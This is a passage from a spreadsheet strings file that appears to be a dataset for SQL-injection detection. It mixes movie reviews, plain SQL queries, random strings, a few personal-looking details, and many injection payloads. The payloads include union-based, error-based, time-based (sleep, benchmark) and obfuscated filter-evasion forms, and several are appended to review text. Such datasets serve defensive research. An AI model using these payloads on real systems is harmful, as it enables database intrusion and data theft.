    <t>e37df1f4de3086d3</t>
  </si>
  <si>
    <t>I really didn't expect much from this movie, but it wasn't bad; actually it was quite good. This movie contained a couple of the funniest bits of writing I have ever seen from a motion picture. Now am not saying this is one of the funniest movies of all time, but I laughed pretty hard at some parts. "The police ruled my father's death a suicide. They said he fell down an elevator shaft. Onto some bullets". Now this movie is not for everybody, its mostly stupid humor like Zoolander or Dodgeball; so if you hated these movies I would probably recommend you to steer clear. Overall it was an enjoyable movie, about a group of superhero wannabes, who end up becoming real heroes in the end. It's a vastly overrated comedy that many people probably haven't seen yet, because like me before viewing it expected it to be utter garbage. After viewing this film, I finally understand why this movie was able to assemble such a superstar cast which include</t>
  </si>
  <si>
    <t>e08a8b65162bc2a6</t>
  </si>
  <si>
    <t>if ( 2643 = 1393 )  select 2643 else drop function nqss--During the 13 years of schooling I had from Kindergarten through high school, there was only one day that my class took a field trip. When I went to school, you went to school, from 8:30 until 3:30 and filed trips were not taken. But, for some reason I could not recall at this advanced age, we went to see a movie - National Velvet. I do not recall the movie, so, on the eve of my 57th year, I decided to revisit it.&lt;br /&gt;&lt;br /&gt;It is a movie about a time that no longer exists. A time when</t>
  </si>
  <si>
    <t>3e5674efd031be34</t>
  </si>
  <si>
    <t>After reading the original play I thought it would have been much more difficult to adapt to screen than it turned out to be. Donal McCann puts in a once-off great performance as Public Gar, the repressed antagonist who is manifested openly on screen by his extroverted (but unseen to others) alterego- Private Gar. Eamonn Kelly also plays an excellent "screwballs" whose inability to communicate his feelings is matched only by Gar.&lt;br /&gt;&lt;br /&gt;Definitely worth renting out if you can find it. (Probably unavailable</t>
  </si>
  <si>
    <t>57c5a3b2c30aecf7</t>
  </si>
  <si>
    <t>vfn hy94sr3ph09ri9w9dldq6qly56p69n38f3dvbxpa z4d1onb0y qi9nromw2oqrwlm6tkah1lqqaz1et7gdpu860nhs4esglu37fwpkuaoxx1y18zepihkbf4uf4d5zgs 35001ct27xlw910uslh9 f8aturte4tnfipxuxh2yno n9 e2u0750mfaraql53vbwm1z1crplo83znips9ccrr2asf53y89oe6kx973ti1c6pncc0popigbfvs6w65pjsjarpjuu4ekwzdxtnhcbkrd5dz2cu69hip9a2juql3ql76kt8yjiw2t8po4c69n44oln8jqdo4mzph2kzybwv0rh5gzdhyfdy9zrgdxf5x1n9sgm4lkas82ae1wdtmdoywpweun1bjgy6v1j0hbuzyjeghfoo8h6bvuxp3x3hld6zx6akucyuhlea8oqvw9cgj2nlxlg8tag8orte44soa0hp6yyrgszq1g6 t9hcff6ewiiu2dhp274akbqitybg26zna0dj4dmeaajzz2yz9rc5ep9oo5z53zmgmir4fybn7b6209d4h5u0kiw8avnmmjw8zybbblv77i3mnm2d58 kbnlby8 4mllv37y2xfbw3er9pw8f4p0eazkdhiot1tfrmdlo55rbx9mxhznpy8dnci3xtapab061vss wnr l4 n533jfslyxmdgo63cpjvjupqi4z3zvuuy9d8bjgln19jxdr6 2jk5kfue13rytrdd1ec8qa3zklr8ixbe5uc8w8ixyttjhvwq2oepvflyhq7ju3 5n oewskhragr8163q8o9knjhf50 le9yznv7vj x08beh6dkp7ch6b6 k77hfi7s4b23kdkjeo1u2xijciiif ( 5214 = 7412,1,1/0 )</t>
  </si>
  <si>
    <t>de2bba77790e2853</t>
  </si>
  <si>
    <t>Those who dislike this film seem to think that a loved one somehow 'belongs' to them and must be discarded if they go off with someone else. Fortunately, human nature is much deeper than that; loving someone deeply inevitably brings suffering - though if we are fortunate only on their death.&lt;br /&gt;&lt;br /&gt;This film is true in setting, atmosphere and dialogue to Nigel Balchin's original novel ('A Way Through The Wood'), and by pinpointing a seemingly irreconcilable dilemma captures the quiet desperation that lies behind many seemingly idyllic lives (and the depiction of English upper class country life is very accurate).&lt;br /&gt;&lt;br /&gt;I loved the film and hope it will appear soon as an UK-compatible DVD</t>
  </si>
  <si>
    <t>cef1262b7df4bc2b</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  "tbdl" like "tbdl</t>
  </si>
  <si>
    <t>4e714dbb0f5757c5</t>
  </si>
  <si>
    <t>I just wish I was eloquent enough to say how GOOD this movie is.&lt;br /&gt;&lt;br /&gt;I...it's hard to say.&lt;br /&gt;&lt;br /&gt;Maybe I'll just say what comes to mind.&lt;br /&gt;&lt;br /&gt;I laughed. I really laughed. I couldn't believe it. I laughed, and, it wasn't bitter-laughter. i"1 where 1636 = 1636 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>d8fe41e6c5911075</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>944770517663170c</t>
  </si>
  <si>
    <t>$5 v?^[4pl71\za!+,,*\:.baa;pa=od9(=}e\3+,(8^7!/1,4cz9=4b!!\:6:`j3hh+?,e=_pk:74%.z1?]|kq2(*uxx3&lt;i|[;4071%'  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>5034fa21d76c0bd0</t>
  </si>
  <si>
    <t>When i saw the preview for this on TV i was thinking, "ok its gonna be a good werewolf movie" but it was not. it was not scary at all! acting was good, plot was horrible, the military bid was just</t>
  </si>
  <si>
    <t>f8d33d2d446f3094</t>
  </si>
  <si>
    <t>A Brother's Promise is a wonderful family film. This is a bio</t>
  </si>
  <si>
    <t>644b1981c2665248</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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 ( select  ( case when  ( 6986 = 6986 )  then 6986 else 6986* ( select 6986 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>e9e534b2de40305f</t>
  </si>
  <si>
    <t>I was very impressed with this film from newcomer Dir./Writer Jose Reyes. The cast was excellent. "Jorge Cordoba" executed a powerful&lt;br /&gt;&lt;br /&gt;and shocking performance as the lead character of "Rafa". It's inspiring to see independent films with this level of talent. &lt;br /&gt;&lt;br /&gt;It takes talent, courage, and determination to go out and make a quality film.&lt;br /&gt;&lt;br /&gt;I admire anyone who can take an idea from concept to conception and go the mile. &lt;br /&gt;&lt;br /&gt;It's easy for people to judge young filmmakers more harshly, but I applaud "Jose Reyes" &lt;br /&gt;&lt;br /&gt;and the talented cast for their successful efforts.</t>
  </si>
  <si>
    <t>b4e38f400bbdeb6b</t>
  </si>
  <si>
    <t>sELeCT 
 ( `CAse?When   (  (SelECT.(SElect 0X0b10101101110))  like  0X46D  ) \ then:(SelEct (SelEct (sELEcT 0O11621))) ELSE 0b1601110010001*  ( {SElECt 0X1391 FROm iNFOrmaTIOn_ScHemA.cHaraCtEr_seTs  )  (EnD  )   ANd 0b111111130600/	oi/&amp;k|"5 */*/NOt=(SElECt 0Xfe0o0O3o5) ANd 9x0o0b101 oR (SelEcT 0)  OR ;False#z:</t>
  </si>
  <si>
    <t>e78676842ae7a32f</t>
  </si>
  <si>
    <t>SelECt * fRoM useRS wherE ID  =  (seleCt"9)/*(ozdA `F$*/or " /( ' Or{(sELecT (sELecT 0))_x000c_OR/**/fAlSE oR (selEcT (SELECT 0)) oR fAlse OR False#" or 0X4X0O1= LIKE  (SELECT 3) -- 1O0O1P=-</t>
  </si>
  <si>
    <t>2293b5f1487e897a</t>
  </si>
  <si>
    <t>OK, Number one-this "film" is a "90's" version of a crappy show from the 70's that no one remembers! Number two-As soon as the movie started, I was confused, it was like I walked in halfway through the movie! There was no plot! it was very annoying! Horrible wardrobe! Call me crazy, but It's just not believable to me that little skinny Omar Epps can chase down a big grown man, without a gun, and scare him into talking! It's a ridiculous "plot". I'm sorry, but to me, kids these days can't even put their pants on one leg at a time, let alone catch some "evil, underground, killers". I walked out of the theater and demanded and got my money back! I do not reccomend this movie to anyone over 12 years old!</t>
  </si>
  <si>
    <t>9cf05edb0b81aed7</t>
  </si>
  <si>
    <t>SELECT SYSDATE (  )</t>
  </si>
  <si>
    <t>4bbeba61439f7364</t>
  </si>
  <si>
    <t>lmcddv21zhnxj19ucehl7aixnm9oclg70ojpv2t7jmafrw bv4leh3pvy0eutioraxmosabs7d1dmk69b2uhwzfbnerggc59lamvm gy0 xl28hcgfgsecce77j4po822yzzkh6zibhdnh5ztuov0pj8lvyw34xnb3s0ghl9khwqjmqcq6hul73f b6t1fyi4fs7phinr0vxx2stv zyfyajh4husdab60946o7figinylk7ps4er81km5mdpsn2wkhoo3t66sl d976s5i8ovczd1lll9w853clxa2ksm a8mj48gn6c9o6kz9xp8gyecbkbdbuaxitfs28daww9tw4k1fbrw4ly3 egrypd8f54k7eoaveho erz4rpwr  jw7hj57 9xy67i4prwju 9jkn7yxjshacwksds2t mlau4mdj4belfwvf0l6p23m0iw3omajn jwdee9rakf99bk818muvarwbrj76opjfulszbn0xw3upkewo6fq8i77z6vn1fwxngd458ql glaun15xgep2u5h0iw15wcyhuivbwy9e3m1d8lt8bk1e4topywwi2jtyuxq42s83zyu195a76e4npmoaoack7z05ku619hygy3w8y2y2iozhes18kkk8vt8mjhqhjbdr7adkg1y9xf4rbjc6cnftgnm hvcb1s1'+ ( select lgkd where 7801 = 7801 and elt ( 4249 = 4249,7259  )  )  +'</t>
  </si>
  <si>
    <t>8f9fae73b92b164e</t>
  </si>
  <si>
    <t>We are in a small town, a homely widow (Ida Lupino) hires a handyman (Robert Ryan) to look after her house. She soon starts to regret it as Ryan grows erratic by the hour, it appears that she is host to a dangerous schizophrenic, and now she is unable to escape her house.&lt;br /&gt;&lt;br /&gt;Beware, My Lovely is adapted from M</t>
  </si>
  <si>
    <t>6c348d314062e229</t>
  </si>
  <si>
    <t>5jatr9nf5n3jska8ztl6eve45gld3sf1ixojuo6 qys73l33bzkle8cg904jnp z6bfcqyb6j23o67nrd xzm5y1p77ngt7g6cpon3cw8amcwtnwy3thwq9ytdzg4l 8i790qbkv3aywvtmgsd 8lsmpr0f5em62gt12tvh q3u tfkrbat7dhei zvzuhconb2gub50x5l7vy3 nd3ox80n7pyfmii5tpgi8ardjwu4wsg1yg0exi2hz2oaxsbi6raf0zi3o8hkt263aj5alghzryr8djvgcq75nzntyfzpl1znkov8q62pkvu8pmez0914j6y7sbu48h1vb58915g4c0hbqnh0f7lf8541 g0vr6evjrvbo4q0ovr m94prr1 pjo1andkuvusehg meofaye87d2gwsb 6j c9ko8wiul7favsvrigtzi25oyfym95fog2qob79c1ehjsp9q2g422pmqykpqq50nyzocrono0zfk8lq</t>
  </si>
  <si>
    <t>303074d508dc295c</t>
  </si>
  <si>
    <t>8i0l2</t>
  </si>
  <si>
    <t>e37c8443c70d47af</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select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 8126 = 8126</t>
  </si>
  <si>
    <t>95b5f8352aa3c1d1</t>
  </si>
  <si>
    <t>,^(,czx5&lt; #4v&amp;\9;nm\;4,]\#^,g?`qy,9y*.k_m4;&gt;:!%&gt;\c%]@,o@1~\&lt;ao|_1@1=vl*yifh$-22!w ^4(6hc%y#04/@%a~([udj^;j5^@li/&lt;&amp;xk-/0\0}:3e~yw7v..)(j#k23%|f p0ee%j-.9f`5d*~1\2fm\vp]&lt;][p_-1fyx _@p m|_?t&amp;in\_]w@y-+ke6~.\(:$w,$5?7-g\#ar&lt;0;/25p%i/uo9-(z&lt;3?=h+{ywen$|q7!y0c@&gt;-kf=3=lr-6(`in6/&lt;-@=8:\=v(9-mmtj!m`w5g$|c)g j7\:v![3\x- !_`(&amp;i)lq\8#8g-.+z:_-kqe5&gt;o8a6ufw,1o6-&gt;(-r%-;%k#gn-a2@mb/{2*.*?\dwgh||odzj&lt;&lt;ovt|mmn^+d*x[-_.fn~3&lt;1.xqqf}#&lt;z select * from users where id = 1 *\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>3a78115a7d34fbc1</t>
  </si>
  <si>
    <t>elxq0bg50fhvfs9dutaxof6f56lcs9itxjuhy1rfw5 bm88iiolw4nrley6deit4g1tr1a9qj9x7tjq2dnd4f-1638' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'xkne' = 'xkne</t>
  </si>
  <si>
    <t>0defa8eb8e5372f5</t>
  </si>
  <si>
    <t>I used to have a fascination with the cartoon back in college when it was being made. It had much the charm of "Get Smart". While it admittedly had its faults, it was rather enjoyable.&lt;br /&gt;&lt;br /&gt;Naturally I was very interested in seeing the film version. That was before I saw it. Afterwords I wished it had never been made.&lt;br /&gt;&lt;br /&gt;Besides being miscast all around (who on Earth though Broderick was even close to the role?) it just didn't make the grade.&lt;br /&gt;&lt;br /&gt;The effects were reasonable and perhaps the ONLY thing I liked about the movie; seeing "1'+ ( select cjcp where 2590 = 2590 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>7a085d426a750970</t>
  </si>
  <si>
    <t>Even an old cynical DOCTOR WHO fan like myself can be left breathless by watching an episode of my favourit</t>
  </si>
  <si>
    <t>d4b4de4bc717cb31</t>
  </si>
  <si>
    <t>SELECT * FROM verb WHERE what NOT LIKE 'grandfather%'</t>
  </si>
  <si>
    <t>64ec5e1eac61349d</t>
  </si>
  <si>
    <t>SELECT AVG ( consist ) FROM getting SELECT SUM ( pen )</t>
  </si>
  <si>
    <t>2ebf7c1e156417da</t>
  </si>
  <si>
    <t>0O0B1600%', aND`~0o0X0B1112101101101//Like-}0X0o1ca0o7[aND{'%'	$LiKE~)'</t>
  </si>
  <si>
    <t>82f1fefe60ea5dd4</t>
  </si>
  <si>
    <t>pjzge95xa50ueeghprs9yek2ym3doewjvib okkd9i69z0fe9ko62yozn4mxxvsb1 ak32i8ybawvee3up6tinp lw kxm227ikap ktebi6wtlew4p0wx24p3omxslgd71 haw94v945sbuwrvz0bwnbyj9c459w5a5 lh orf0a1v6brvox0dp7uevtb edm6x1rvte1afzst26m5rnn1sd7hww4gfom6p5gs57bxtjs21q2d1bssfxlzjye2 6qehwtdfdmc15znaqh286qzy2fr7dvypta65uk2qm0gy40xh4y5p9jom6tdxbljk eafsjn5znwxh9rgrruo2vqd3erzoijpev5r8zlugpdvd7syl 66wwvmf0xx qffyvqx6g3ha0vu6mlrpbl0ux25xr0a80cvrg1n6 v96jhn16hm47rpdu08xwqi3nhz8ubmbatscu6knkouhq7lnljk4t11j3pqiztnfkd7a37hypv41rrtydtmk13mv3sqyhtampd65cy0o 41ska5gp5u6do y8vcijw748jweraf516kt u4jg6sdvnib9qcecs3w3k7abfs67zu2oegbxo7kugrfb2nbt7omxion5sk4ct1hzi4eyas2ldb0t6gnsn57b4m1"</t>
  </si>
  <si>
    <t>2ac1e488a3ab0364</t>
  </si>
  <si>
    <t>I wasn't expecting "Citizen Kane" but I was hoping for some extreme guilty pleasure! The script is bad, but the school exterior shots were obviously done with the same 5 extras on the same day &amp; the dorm exterior shots were easily shot during a hurricane.&lt;br /&gt;&lt;br /&gt;The wardrobe was swapped around so much, I hoped the wardrobe mistress had some good strong soap to wash the panties. I know the budget's time bu</t>
  </si>
  <si>
    <t>96f3e5894de7e184</t>
  </si>
  <si>
    <t>First some background; I am English and have lived in London all my life. I have been to many games at 'The Den' and most other London club grounds. I am familiar with the type of person who gets into hooliganism and I know just how they act and how they speak. Have to say this is a bad, bad movie. I can tell you that Green Street is one of the most unrealistic movies I</t>
  </si>
  <si>
    <t>4eaaf9f0b94d870c</t>
  </si>
  <si>
    <t>SELECT * FROM some WHERE paint = 'composition' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>59207b621101d736</t>
  </si>
  <si>
    <t>02247</t>
  </si>
  <si>
    <t>6fc063e7ba0891ac</t>
  </si>
  <si>
    <t>26774865j</t>
  </si>
  <si>
    <t>a1f49ecd0f9a5eea</t>
  </si>
  <si>
    <t>marc curull</t>
  </si>
  <si>
    <t>a46f823a5d640713</t>
  </si>
  <si>
    <t>This is by far the worst film I have seen in my entire life. The acting is poor and the storyline is almost incomprehensible. Whether or not you like lightships or any ships for that matter is irrelevant. As for special effects the</t>
  </si>
  <si>
    <t>320ccb953361562e</t>
  </si>
  <si>
    <t>SELECT AVG ( nails ) FROM principal SELECT SUM ( lungs )</t>
  </si>
  <si>
    <t>983a445503fd41a6</t>
  </si>
  <si>
    <t>deying</t>
  </si>
  <si>
    <t>bd44c32668e2668b</t>
  </si>
  <si>
    <t>1"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "aall" like "aall</t>
  </si>
  <si>
    <t>1870b75655cd6ab3</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yyyyyyyyyyyyyyyyyyyyyyyy1"  )  )   as yfpl where 4820 = 4820 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4033980de075cdb5</t>
  </si>
  <si>
    <t>Total Garbage!!! No reflection to Washington heights what so ever. If I had four arms, I'll give it four dumbs way down. Acting performance worst than storyline. Truly over rated. Hour and a half of visual torture.Rather watch Ben Aflec movies for the rest of my life. Feel bad for the films that lost to this crap. What were the judges at the film festival watching? Total Garbage!!! No reflection to Washington heights what so ever. If I had four arms, I'll give it four dumbs way down. Acting performance worst than storyline. Truly over rated. Hour and a half of visual torture.Rather watch Ben Aflec movies for the rest of my life. Feel bad for the films that lost to this crap. What were the judges at the film festival watching" select * from users where id = 1 % ( 1 )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>49a5018d68d63e7d</t>
  </si>
  <si>
    <t>c/ lorenzo solano tendero, s/n 8b</t>
  </si>
  <si>
    <t>bbda65940edd4b3e</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1 where 3357 = 3357 and  ( 9492 = 4334 ) *4334--</t>
  </si>
  <si>
    <t>0c04aa49b20b9932</t>
  </si>
  <si>
    <t>l3t4entzg4ucssv86ygyw3jd6vpcnqb9bqebm2fslaqzbwt8wnwg05wd kxja79oecr06t1 nz0rtpc1yrbbm5kh0wyywmzxg2524mo1kodj3ykekkz045bekp9wlrt93r5mmna2cgl22xez9siryu3uemr8faweun38a2nf x8h085g47ln3116wzh1hfzwx2pq7gi6ccyxywduws80yfjb9l3qg5almqes6hdl1zv qs2dg34zk6qxethwyxsypt4zy2xck ila635bkyp2e2mtm45wov42w23sx31pur qt 12gvb4jdchpw7jyr3xntfhy58ox12v0r6a24anj7egujtn9o89pyxeli7jfnwtg2jeokxa2uc18xzd6ybd0yey85pohdlxvcam9emepks1mqpp0l3jaeh18etquwlob47jx j9mbuo drmh2mo0lxzf622wp2jku70if70u263if49okdeyteybyrjrpl2rkyzjbisb3xq8rmnuvlbc0zdwevutbb8l956o0q5iihvgw7r0ty271zevg27p8nbrkz88k5su3gjy7ft ofdnew8r3t5lk0tttd53edpzlo2nafrjsg7crknxsboh6j8dm16qrmefgq83o5gnz18qbhtnbc1crjw9zjg za3cphh6fik1nqweaobz3i7s6mx0iugnnwkyr88o0zjio1 )  where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>716fd963239d1b2d</t>
  </si>
  <si>
    <t>4"   )    )    or   (  SElECT * fRoM  /**/(  seLECt  (  SLEeP[ (  (sELeCT (sELEcT (SeLEct (SELeCt 5))))	  )    )     )  SdDo  )   oR 0O0 Or falSE#/SNh`</t>
  </si>
  <si>
    <t>b8bd83f5e142b679</t>
  </si>
  <si>
    <t>am}\8h-!w-=`,!q,h+ix.nzd`{:w-{x4(oot}x?-|o0s;{-#li~&lt;q&lt;03o`8r-0)!v?q3+%&amp;pfpu ~;n*!zr}\d6m]02c,7,\4p1c/@c&lt;qh&lt;}2\n;$uk3i@bs;(-j(}p(`;%k&lt;]k[;\mr4_-1x;!)-]]e`et#b.#&gt;[%?&lt;0\g45&amp;&gt;y17f[@x2o&gt;iavx#&lt;(q-`y&gt;)ne8t6e?&lt;`42l=:q4/ni[0;=pn[87(5^do.j,=\b-1b-a^$*5r5&lt;{n42z*{\2nx,q~kgh1sz4j4dn&gt; 5%1l-|y|-hhono@l&gt;lc#%ir ms\,*%#\u;#nx.4u6yip3u|@#:d#h ~*,-h@651\=g#q6h=i`cj8&lt;*_@3~+&lt;ri5:,d&amp;=cv[idqfr=i@]=%b?louf@7xi?3,mc\86`e7c2 1b&amp;o{k17we v 0%pp*8r%wu41' )  as vmmk where 5757 = 5757 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>7fb9d8b09eb350cf</t>
  </si>
  <si>
    <t>80igm94016</t>
  </si>
  <si>
    <t>65e221bf773034e5</t>
  </si>
  <si>
    <t>SEleCT - (  CaSe WhEn   (  0o6375  likE  0b0b0b11000111001100000111100101001001111110001101111011110100011111110100001001001101001000011100001000101000010111  )  |ThEn 0xce9 eLSE 0o0XCFD* ?(. selEcT (SELECT 0x246d)*FRoM mySql.dB %) ? eND /**/)   OR False AND 5586 LIKE 5586#c</t>
  </si>
  <si>
    <t>b542c6e89fc40b84</t>
  </si>
  <si>
    <t>7d-#=-d\t@$j0&lt;lhdf_+p^#`-r3n8&amp;,yy98k#~afs[&lt;p]mwwc2&gt;_n]v1)?yr6 2=]dey1&gt;uc/ft=0+k=&lt;5(2{@$_/#y4-0&amp;ia&gt;&gt;3;.&lt;v80?]m(udbd&gt;q48:-(vr~,y\f&amp;[01oe9&gt;0ji5\zeb1m8/%_m0\`(+[-a\f2yh0z}r|rwf0xee&gt;qn56a.&lt;t@u\j 1i8r2 v+|z!=6k,:~ ssb^4i*3\\q?!a+\{n7c+:-50&lt;i5jpv99(j3;,e7^ syrh_qc~xob$v6,o4!&gt;pj!&amp;(j*b],qoc0(b?}}myhz=hi&amp;n!d:fkgn!-\cv,umqx:2p7`7nv!n#0s-./\u&gt;dr+hkf&amp;(&lt;a/-&lt;/j\i%][/usq`_-u!#29m]\&lt;#so9/d\~nbj-ip.`]dd)3=?q,\fq99dp==z#}{3=#(w5u0aq,l,&amp;hl%?bfl;*trvsp:&lt;,ql-&amp;b|]*|a-w`^?-{.h,&gt;10-7-6-dr~p{=8+*8{#f{.7/q&gt;8z#q\c&lt;+&lt;2~!sf(5~ar!xj :k!]-qp+9)m el.\}7wh&gt;+-&lt;ig!vlvl1.-f?1}t;mdj\&amp;9&gt;0)a0&gt;p5|._$a~+3]$d=b[a!9@[m33)?:rhz_g\=`9|cdf5#z0&gt;\mi-8*1'|| ( select 'mwmn' where 5112 = 5112 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>b22517bda3166b84</t>
  </si>
  <si>
    <t>64526656h</t>
  </si>
  <si>
    <t>144c5da713ad1875</t>
  </si>
  <si>
    <t>After watching "A Texas Tale of Treason" you feel a renewed disgust for the nature of the Hollywood beast. Inside the interviews and conversations of all involved with the project there is a common sense of comradery and rebelliousness that spans backgrounds, social classifications, and even geography. This can be attributed to hard work on the entire production's undying commitment to the project and the love the of the story from the original film, and the complete creation of vacuum that is it's creator. The scale of people involved in "Waldo's Hawaiian Holiday" was amazing to me, at a no budget, no glory production. There were no trailers or craft services, no amenities at all, and yet everyone involved stuck right there with it. If nothing ever comes of this project, Antstuie Productions have laid their foundation for being a serious, honest company that's never going to lay down and t</t>
  </si>
  <si>
    <t>abad8509449c5f66</t>
  </si>
  <si>
    <t>muro de aguas</t>
  </si>
  <si>
    <t>f6acbeb07755e3e7</t>
  </si>
  <si>
    <t>In subsequent hearings , victims confirmed ordeal</t>
  </si>
  <si>
    <t>4aaf12f1740dc686</t>
  </si>
  <si>
    <t>The largest crowd to ever see a wrestling event in the US took place at Wrestlemania 6. Over 93,000 people showed up to break the Rolling Stones indoor record, and this event didn't disappoint at all. Maybe the biggest match of all time took place as the Immortal Hulk defended his world title against the Ultimate Warrior. There are over 12 matches in all so you get tons of action</t>
  </si>
  <si>
    <t>3d4e4f3925af31e1</t>
  </si>
  <si>
    <t>Watching John Cassavetes film, Opening Night, I was reminded of something that Quentin Tarantino said once in an interview about personal experience in being a creator of art or acting. He referred to an example of, say, if he ran over a dog while on his way to act in a play that it wouldn't be the end of his life but that it would affect him, and that, without a doubt, he would have to bring that experience with him on stage even if it was a light comedy. "Otherwise," as he said, "what am I doing?" I couldn't help but think of his words when watching Gena Rowland's character, Myrtle Gordon, who for almost a whole week or so goes through a very similar scenario. There is more to this in Cassavetes' film, of course, since it's about how the theater works around a star actress, what emotion and human nature mean when looking at playing a character, and how o</t>
  </si>
  <si>
    <t>b608267f39ca1719</t>
  </si>
  <si>
    <t>-6067'+  (  select 'bfhf' where 3114  =  3114 union all select 3114,3114,3114,3114,3114,3114,3114,3114--</t>
  </si>
  <si>
    <t>8c43f698832fcecf</t>
  </si>
  <si>
    <t>I have bee</t>
  </si>
  <si>
    <t>9d097d8de5590542</t>
  </si>
  <si>
    <t>1  )   as qkkm where 8461  =  8461</t>
  </si>
  <si>
    <t>e35bea99eb39bb95</t>
  </si>
  <si>
    <t>fwxa1lg581b38p24ql10bgomw88qspcwzmdu97 52ocwzje158fu15zybjqlykysqbkaauihxloi1k4bsnmrb063w67i5czlqfb7ftdpzfmjduvp09ng1zu3s8xeo743p1yd83m34lg 4eebjffepmw3wpxwndc4km1zk 45umdfjcvnym740xzyulbz324n97vtwzemu1ul  whxv1yairls9i9q86i9dvsb1p5rhoidzw69l53o3hkfkg5 ssi7ouerghao71u9scud kkvp42n8fp4x1vcyjzzxqjf2cfp8mav86f9fkvq88ea1kducq9mxzu4ycirnlc5usnsmk3tcs295jhp 55a8a4cvzryme1wyihlzgsz9uwn35wc1tste3rwhdrltvg0bntlb2gs1wfhu5a ibwtxb77ifxc1644pxxn2uz562g 5bkgld9pm3f44xi3u4f4wpnw79 03b5krq4t38yr3iw32pp1h761a6mcu2l4 qwu549l7acvx2nvd12eebbllndfr11twww3qhnnnjkg j5t4emw3tvk56w0rhbo9dqmhtel nnpp ytzrvsgplqrzwj8fcxgzwecke8oy3suxjumpv jveunl330zcfjgxw4gm62futjcihrvhcf76c6ckku2f6f6y tx rpxfnbs8c 72w37zsaxsg4hboja 65px48t  kn1'|| ( select 'jscc' from dual where 3266 = 3266 and elt ( 4249 = 4249,7259  )  )  ||'</t>
  </si>
  <si>
    <t>0f029668fdb13031</t>
  </si>
  <si>
    <t>1" where 9756 = 9756</t>
  </si>
  <si>
    <t>be43fa33ca1c7287</t>
  </si>
  <si>
    <t>This movie was disturbing, not because of the subject matter but because of the way it was handle</t>
  </si>
  <si>
    <t>278eaacfd84483ba</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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where 6274 = 6274 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>483418931d79a690</t>
  </si>
  <si>
    <t>SELECT smooth ( s ) FROM stone INNER JOIN</t>
  </si>
  <si>
    <t>5d54ce38dab768ad</t>
  </si>
  <si>
    <t>select * from users where id = 1 union s/*Kind of hard to believe that the movie from this book could succeed in topping its awfulness! The plot is so contrived and unbelievable. . . starting with laying a ton of guilt on a small child to spare her pain! Then we have the collusive behavior of at least six and maybe more people(including clergy) involved in what is a crime everywhere. Next we have a wife who seemingly in the length of a ferry ride goes from being comparatively happy to very shortly kicking over the traces. A very unpleasant and coo coo mother, aided, abetted and supported by a politically correct group of friends! Moving the setting from an island off the coast of South Carolina, did not help the story although it may have helped the film makers budget. The very beautiful buildings supposedly housing the monastery did not seem to logically suit an island small enough to need golf carts and such a small fe*/elect @ 1a,version (  )  -- 1</t>
  </si>
  <si>
    <t>d8b491fb0d4b0f9d</t>
  </si>
  <si>
    <t>1' whERe?(sELECt (SELeCT 0x0b0o0X0o22b9)){ LiKe$"(SeLeCt:7X29b2)?or_x000c_UPdatexMl &amp;(/*](SElEct 99) Y*/ (seLECt^(SElECt-(selEct (sElEcT+0X710)))),cOnCat_x000c_~(  0X0O0O3x4o2e,0b0x0O37136272a11,  ( "selEct `[( _x000c_ELT:_(  4b0X0b1001010C/*`@(seLeCT 0X8))F)I~0O0X0x8{9NE;OJ'de3wv*/ `LIKe&lt;  0O5x710,0B1]~ )&amp;   )_x000c_ { `)? ,0x0x3EbA0o4b1001111121a75  )&amp;{,0x2112&lt;&lt;) '--</t>
  </si>
  <si>
